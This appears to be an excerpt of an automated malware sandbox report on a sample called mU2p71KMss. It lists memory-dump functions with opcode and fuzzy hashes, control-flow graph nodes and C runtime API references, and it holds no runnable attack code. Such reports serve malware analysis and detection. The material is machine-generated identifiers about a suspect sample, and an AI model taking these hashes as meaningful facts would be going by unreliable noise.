                                                                                                  • Instruction ID: 2bb89213d009dfa1e784231829cf903763ce2da1c49396aadf6fc256f52eca8d
                                                                                                  • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                  • Instruction Fuzzy Hash: 52C12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDB0B0 Relevance: .3, Instructions: 345COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                  • Instruction ID: 0ff908bc8df79a85eb4b7f5e9b1e4e291c51afcf6a8ce99a75e8a90c30ef37f7
                                                                                                  • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                  • Instruction Fuzzy Hash: EFA1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD30F0 Relevance: .3, Instructions: 336COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                  • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                  • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                  • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDCA10 Relevance: .3, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction ID: ff11d47c215cf5ce38ca31ccc2ee3a5af86bed5d40a3a231cdd511769fb0b700
                                                                                                  • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction Fuzzy Hash: 59C18DB5E003599FCB54CFA9C885AEEFBF1FF48200F24856AD919E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD5DE7 Relevance: .3, Instructions: 278COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                  • Instruction ID: 91e7e9e4677b5d8e45ddebf19e47b8dee26372f04f09666baff2cde3f4abfc84
                                                                                                  • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                  • Instruction Fuzzy Hash: F8B183B0039FA686CBD3FF30911024BF7E0BFC525DF44194AD99986864EB3EE94E9215
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD7520 Relevance: .3, Instructions: 251COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                  • Instruction ID: 57f196c05cae5ed2f05a1380c0e5b87930e83f74f9f0793881f597dd9e520d03
                                                                                                  • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                  • Instruction Fuzzy Hash: FA912573D187BA06D7609EAF8C441B9B7E3AFC4210F9B077ADD9467282C9309E0697D0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDC760 Relevance: .2, Instructions: 239COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                  • Instruction ID: b6c4c8543c6b83e23b26d6d775169b2cb838d3a03aeebe8caab8a0b854f79901
                                                                                                  • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                  • Instruction Fuzzy Hash: 85B16AB5E002599FCB84CFE9C985ADEFBF0FF48210F64816AD915E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDA916 Relevance: .2, Instructions: 227COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                  • Instruction ID: da5101756d2d4a8c482913e19da46b55f8b55395718c69e9073e5bc0760d2360
                                                                                                  • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                  • Instruction Fuzzy Hash: 9A71D473A20B258B8314DEB98D94192F2F1EF84610B57C27DCE85D7B41EB31B95A96C0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD59F7 Relevance: .2, Instructions: 216COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                  • Instruction ID: 1f7cc5b6fc79ded5983188fc1ecbbb0139808f34b5c5af612268af725f254638
                                                                                                  • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                  • Instruction Fuzzy Hash: 188139B2A047019FC328CF19D88566AF7E1FFD8210F15892DE99E83741D770F8558B92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD8E60 Relevance: .2, Instructions: 207COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                  • Instruction ID: e1ba46c44bf60c03d5ea5d93caa6bb49d1b59791ef778fa2949889adb83eb94f
                                                                                                  • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                  • Instruction Fuzzy Hash: 96710622535B7A0AEBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDA699 Relevance: .2, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                  • Instruction ID: 852a0ece14f3bd30327213e73b4d9100f1be7e0fc53bd6295050627b1640c110
                                                                                                  • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                  • Instruction Fuzzy Hash: CD812776A10B669BD754CF2ED8C046AFBF1FB08210B518A2ADCA583B41D334F565CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD9120 Relevance: .2, Instructions: 160COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                  • Instruction ID: 58708a4e77d084a74b2639f795b31ed05248847065df4d67eb6902820e9edec7
                                                                                                  • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                  • Instruction Fuzzy Hash: 7A61A3339046BB5BDB649E6DD8401A9F7A2BFC4310F5B8A76DC9823642C234EA11DBD0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD7A80 Relevance: .2, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                  • Instruction ID: 255717732b50be066553d8875c9cce05e79aadd859804988ff0927700f74f213
                                                                                                  • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                  • Instruction Fuzzy Hash: 69617C3791262B9BD761DF59D84537AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD7880 Relevance: .1, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                  • Instruction ID: 63e5dabac5e50bdb647ecf6401b8db64eb139f3c4e40c712b56527e96dd08af5
                                                                                                  • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                  • Instruction Fuzzy Hash: E551DD229257B945EBC3DA3D88504AEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD7220 Relevance: .1, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                  • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                                                                                  • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                  • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0438971C Relevance: .1, Instructions: 105COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                  • Instruction ID: 24d27a6aa43525e76c7b7a3e232a10fa7948a000dac409155106f76070f4aa25
                                                                                                  • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                  • Instruction Fuzzy Hash: E93169B58063869FCB15DE70D890BB5FB70EF87324F18A5DCD0858F506D3266046CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD70E0 Relevance: .1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                  • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                  • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                  • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD7393 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                  • Instruction ID: 6554821c01a8fa3d2f2a7eb05a68a0db1abdec3f1d5c79325b7793689e55f228
                                                                                                  • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                  • Instruction Fuzzy Hash: 9C3126306183419FD741EF29C480A5BFBE0FFC8254F41DA5AF98897221D730E984CB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF18D0 Relevance: .1, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                  • Instruction ID: 8a651747b522e78abd6528a3049a9d2aa84ef3e63613aefee5752d50c8d5345a
                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                  • Instruction Fuzzy Hash: 4F112977208182C3D60486AED8B45B693D5FBC6220B2F437BD3B34B658D122D141DB80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDB000 Relevance: .1, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                  • Instruction ID: 9eb0d746c4bf04be3216c63df409a43d170dbd674bd1ed84af94adf103ca23cc
                                                                                                  • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                  • Instruction Fuzzy Hash: B9114F0A8492C4BDCF424A7840E56EBFFA68E3B218F4A71DAC8C44B743D01B150FE7A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DD0042 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction ID: a0c667d4b89f8b08d9b17e9ec1244e7f1588fd36b86ba9f8430e65f2fc4cdc94
                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction Fuzzy Hash: E9117C72340100AFEB54DE65DC98EB6B3EAFB88220B198166E908CB351F676E841C760
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 043880A3 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction ID: 9f246c348f4fe5b17f51de925c196404139bae6605caef43048eaed438194485
                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction Fuzzy Hash: A511A972340200AFD754EF55DCC0FA6B3D9EB89364B598169ED04CB312D775E841C760
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DDA79A Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                  • Instruction ID: 2171f14de095971ce99d3b8a5c03f15d6e88b3d0eeaa7b279bc14600646ac797
                                                                                                  • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                  • Instruction Fuzzy Hash: 92012876810662ABD740DF3EC8C045AFBF1BB082117528B2ADC9083A41D334E662DBE8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF6437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 551 5df6437-5df6440 552 5df6466 551->552 553 5df6442-5df6446 551->553 555 5df6468-5df646b 552->555 553->552 554 5df6448-5df6459 call 5df9636 553->554 558 5df646c-5df647d call 5df9636 554->558 559 5df645b-5df6460 call 5df5ba8 554->559 564 5df647f-5df6480 call 5df158d 558->564 565 5df6488-5df649a call 5df9636 558->565 559->552 569 5df6485-5df6486 564->569 570 5df64ac-5df64cd call 5df5f4c call 5df6837 565->570 571 5df649c-5df64aa call 5df158d * 2 565->571 569->559 580 5df64cf-5df64dd call 5df557d 570->580 581 5df64e2-5df6500 call 5df158d call 5df4edc call 5df4d82 call 5df158d 570->581 571->569 586 5df64df 580->586 587 5df6502-5df6505 580->587 590 5df6507-5df6509 581->590 586->581 587->590 590->555
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1442030790-0
                                                                                                  • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction ID: 4f620b39587d60cd88a05e8ec2825413131bf58832e8d2c6b0fc893c4861d1b0
                                                                                                  • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction Fuzzy Hash: F021D531708601EEEB317F65DC09E1BBBE5EF41760B53802BE78655AA0EA22C550CB71
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF3F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 595 5df3f16-5df3f2f 596 5df3f49-5df3f5e call 5dfbdc0 595->596 597 5df3f31-5df3f3b call 5df5ba8 call 5df4c72 595->597 596->597 602 5df3f60-5df3f63 596->602 606 5df3f40 597->606 604 5df3f77-5df3f7d 602->604 605 5df3f65 602->605 609 5df3f7f 604->609 610 5df3f89-5df3f9a call 5e00504 call 5e001a3 604->610 607 5df3f6b-5df3f75 call 5df5ba8 605->607 608 5df3f67-5df3f69 605->608 611 5df3f42-5df3f48 606->611 607->606 608->604 608->607 609->607 613 5df3f81-5df3f87 609->613 619 5df4185-5df418f call 5df4c9d 610->619 620 5df3fa0-5df3fac call 5e001cd 610->620 613->607 613->610 620->619 625 5df3fb2-5df3fbe call 5e001f7 620->625 625->619 628 5df3fc4-5df3fcb 625->628 629 5df3fcd 628->629 630 5df403b-5df4046 call 5e002d9 628->630 632 5df3fcf-5df3fd5 629->632 633 5df3fd7-5df3ff3 call 5e002d9 629->633 630->611 636 5df404c-5df404f 630->636 632->630 632->633 633->611 640 5df3ff9-5df3ffc 633->640 638 5df407e-5df408b 636->638 639 5df4051-5df405a call 5e00554 636->639 642 5df408d-5df409c call 5e00f40 638->642 639->638 648 5df405c-5df407c 639->648 643 5df413e-5df4140 640->643 644 5df4002-5df400b call 5e00554 640->644 651 5df409e-5df40a6 642->651 652 5df40a9-5df40d0 call 5e00e90 call 5e00f40 642->652 643->611 644->643 653 5df4011-5df4029 call 5e002d9 644->653 648->642 651->652 661 5df40de-5df4105 call 5e00e90 call 5e00f40 652->661 662 5df40d2-5df40db 652->662 653->611 658 5df402f-5df4036 653->658 658->643 667 5df4107-5df4110 661->667 668 5df4113-5df4122 call 5e00e90 661->668 662->661 667->668 671 5df414f-5df4168 668->671 672 5df4124 668->672 675 5df413b 671->675 676 5df416a-5df4183 671->676 673 5df412a-5df4138 672->673 674 5df4126-5df4128 672->674 673->675 674->673 677 5df4145-5df4147 674->677 675->643 676->643 677->643 678 5df4149 677->678 678->671 679 5df414b-5df414d 678->679 679->643 679->671
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 05DF3F51
                                                                                                    • Part of subcall function 05DF5BA8: __getptd_noexit.LIBCMT ref: 05DF5BA8
                                                                                                  • __gmtime64_s.LIBCMT ref: 05DF3FEA
